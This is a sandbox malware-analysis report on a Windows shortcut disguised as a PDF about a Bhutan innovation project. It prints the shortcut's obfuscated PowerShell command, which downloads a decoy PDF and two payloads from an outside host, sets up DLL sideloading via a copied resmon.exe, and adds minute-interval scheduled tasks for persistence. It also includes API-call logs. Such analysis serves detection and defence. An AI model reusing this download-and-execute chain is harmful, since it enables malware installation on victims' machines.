Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 9, 2024, 11:17 a.m.	July 9, 2024, 11:19 a.m.

Size	4.3KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Wed May 11 00:09:09 2022, mtime=Tue Jan 31 20:11:32 2023, atime=Wed May 11 00:09:09 2022, length=452608, window=hide
MD5	`51565dd3cedcdcf0040a62e31758a525`
SHA256	`14bbe421abe496531f4c63b16881eee23fb2c92b2938335dca1668206882201a`
CRC32	`9D854201`
ssdeep	`48:8oLuaFkhOUTFIXIoI2PsknQ0iXin+fO/IJAqLbhAqLbluZd0Y9XuHQBqiYLq4:8oLXkOXYtXknQHin+WAKZnYY1um3YLq`
Yara	Antivirus - Contains references to security software lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "PZFlafErlokfv" C:\Users\test22\AppData\Local\Temp\Large_Innovation_Project_for_Bhutan.pdf.lnk
2580
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w""i 1 $ProgressPreference = 'SilentlyContinue';i''w''r https://adaptation-funds.org/documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;s''a''p''s C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf;i''w''r https://beijingtv.org/wpytd52vDw/brtd2389aw -OutFile "C:\Users\Public\hal";r''e''n -Path "C:\Users\Public\hal" -NewName "C:\Users\Public\edputil.dll";i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1e -OutFile "C:\Users\Public\sam";r''e''n -Path "C:\Users\Public\sam" -NewName "C:\Users\Public\Winver.exe";c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmon.exe;c''p''i 'C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf' -destination .;sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUpdate /tr 'C:\Users\Public\resmon';sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUppdate /tr 'C:\Users\Public\Winver';e''r''a''s''e *d?.?n?
  2692
  - schtasks.exe "C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUpdate /tr C:\Users\Public\resmon
    2852
  - schtasks.exe "C:\Windows\system32\schtasks.exe" /create /Sc minute /Tn MicroUppdate /tr C:\Users\Public\Winver
    2900

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 9, 2024, 11:17 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 9, 2024, 11:17 a.m.			0	0

Command line console output was observed (50 out of 135 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: The term 'iwr' is not recognized as the name of a cmdlet, function, script file console_handle: 0x00000023	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x0000002f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: At line:1 char:49 console_handle: 0x00000047	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + $ProgressPreference = 'SilentlyContinue';i''w''r <<<< https://adaptation-fun console_handle: 0x00000053	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ds.org/documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Publ console_handle: 0x0000005f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ic\Large_Innovation_Project_for_Bhutan.pdf;s''a''p''s C:\Users\Public\Large_Inn console_handle: 0x0000006b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ovation_Project_for_Bhutan.pdf;i''w''r https://beijingtv.org/wpytd52vDw/brtd238 console_handle: 0x00000077	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: 9aw -OutFile C:\Users\Public\hal;r''e''n -Path C:\Users\Public\hal -NewName C:\ console_handle: 0x00000083	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: Users\Public\edputil.dll;i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1 console_handle: 0x0000008f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: e -OutFile C:\Users\Public\sam;r''e''n -Path C:\Users\Public\sam -NewName C:\Us console_handle: 0x0000009b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ers\Public\Winver.exe;c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmo console_handle: 0x000000a7	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: n.exe;c''p''i 'C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf' -destin console_handle: 0x000000b3	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ation .;sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUpdate /tr 'C:\Users console_handle: 0x000000bf	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: \Public\resmon';sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUppdate /tr console_handle: 0x000000cb	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: 'C:\Users\Public\Winver';e''r''a''s''e *d?.?n? console_handle: 0x000000d7	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + CategoryInfo : ObjectNotFound: (iwr:String) [], CommandNotFound console_handle: 0x000000e3	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: Exception console_handle: 0x000000ef	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000000fb	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: Start-Process : This command cannot be executed due to the error: The system ca console_handle: 0x0000011b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: nnot find the file specified. console_handle: 0x00000127	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: At line:1 char:204 console_handle: 0x00000133	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + $ProgressPreference = 'SilentlyContinue';i''w''r https://adaptation-funds.org console_handle: 0x0000013f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: /documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Public\Lar console_handle: 0x0000014b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ge_Innovation_Project_for_Bhutan.pdf;s''a''p''s <<<< C:\Users\Public\Large_Inn console_handle: 0x00000157	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ovation_Project_for_Bhutan.pdf;i''w''r https://beijingtv.org/wpytd52vDw/brtd238 console_handle: 0x00000163	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: 9aw -OutFile C:\Users\Public\hal;r''e''n -Path C:\Users\Public\hal -NewName C:\ console_handle: 0x0000016f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: Users\Public\edputil.dll;i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1 console_handle: 0x0000017b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: e -OutFile C:\Users\Public\sam;r''e''n -Path C:\Users\Public\sam -NewName C:\Us console_handle: 0x00000187	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ers\Public\Winver.exe;c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmo console_handle: 0x00000193	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: n.exe;c''p''i 'C:\Users\Public\Large_Innovation_Project_for_Bhutan.pdf' -destin console_handle: 0x0000019f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ation .;sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUpdate /tr 'C:\Users console_handle: 0x000001ab	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: \Public\resmon';sch''ta''s''ks /c''r''e''a''te /Sc minute /Tn MicroUppdate /tr console_handle: 0x000001b7	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: 'C:\Users\Public\Winver';e''r''a''s''e *d?.?n? console_handle: 0x000001c3	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp console_handle: 0x000001cf	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: erationException console_handle: 0x000001db	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C console_handle: 0x000001e7	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ommands.StartProcessCommand console_handle: 0x000001f3	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: The term 'iwr' is not recognized as the name of a cmdlet, function, script file console_handle: 0x0000001b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: , or operable program. Check the spelling of the name, or if a path was include console_handle: 0x00000027	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: d, verify that the path is correct and try again. console_handle: 0x00000033	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: At line:1 char:268 console_handle: 0x0000003f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: + $ProgressPreference = 'SilentlyContinue';i''w''r https://adaptation-funds.org console_handle: 0x0000004b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: /documents/Large_Innovation_Project_for_Bhutan.pdf -OutFile C:\Users\Public\Lar console_handle: 0x00000057	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ge_Innovation_Project_for_Bhutan.pdf;s''a''p''s C:\Users\Public\Large_Innovatio console_handle: 0x00000063	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: n_Project_for_Bhutan.pdf;i''w''r <<<< https://beijingtv.org/wpytd52vDw/brtd238 console_handle: 0x0000006f	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: 9aw -OutFile C:\Users\Public\hal;r''e''n -Path C:\Users\Public\hal -NewName C:\ console_handle: 0x0000007b	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: Users\Public\edputil.dll;i''w''r https://beijingtv.org/ogQas32xzsy6/fRgt9azswq1 console_handle: 0x00000087	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: e -OutFile C:\Users\Public\sam;r''e''n -Path C:\Users\Public\sam -NewName C:\Us console_handle: 0x00000097	1	1
WriteConsoleW July 9, 2024, 11:17 a.m.	buffer: ers\Public\Winver.exe;c''p C:\Windows\System32\resmon.exe C:\Users\Public\resmo console_handle: 0x000000a3	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 57 events)

Time & API	Arguments	Status	Return
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5d08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e62c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e62c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e62c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6708 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e6448 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 9, 2024, 11:17 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e5e08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 9, 2024, 11:17 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 147 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02940000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02722000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02723000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02724000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02725000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02726000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 9, 2024, 11:17 a.m.	process_identifier: 2692 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
